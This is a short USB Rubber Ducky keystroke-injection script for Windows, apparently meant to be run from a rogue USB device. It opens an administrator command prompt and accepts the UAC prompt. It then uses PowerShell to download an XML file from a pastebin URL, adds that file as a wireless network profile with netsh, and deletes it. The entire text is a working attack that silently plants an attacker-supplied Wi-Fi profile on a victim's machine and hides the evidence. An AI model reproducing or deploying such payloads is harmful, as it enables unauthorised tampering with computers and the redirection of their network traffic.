WINDOWS q
DELAY 300
STRING cmd
DELAY 300
MENU
DELAY 300
RIGHTARROW
DELAY 200
RIGHTARROW
DELAY 200
RIGHTARROW
DELAY 200
ENTER
DELAY 600
ALT y
DELAY 800
STRING cd %TEMP%
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=8WsHSWdZ','%TEMP%\a.xml')
ENTER
DELAY 1000
ENTER
STRING netsh wlan add profile filename="a.xml" interface="Wireless Network Connection"
ENTER
STRING del a.xml
ENTER
STRING exit
ENTER
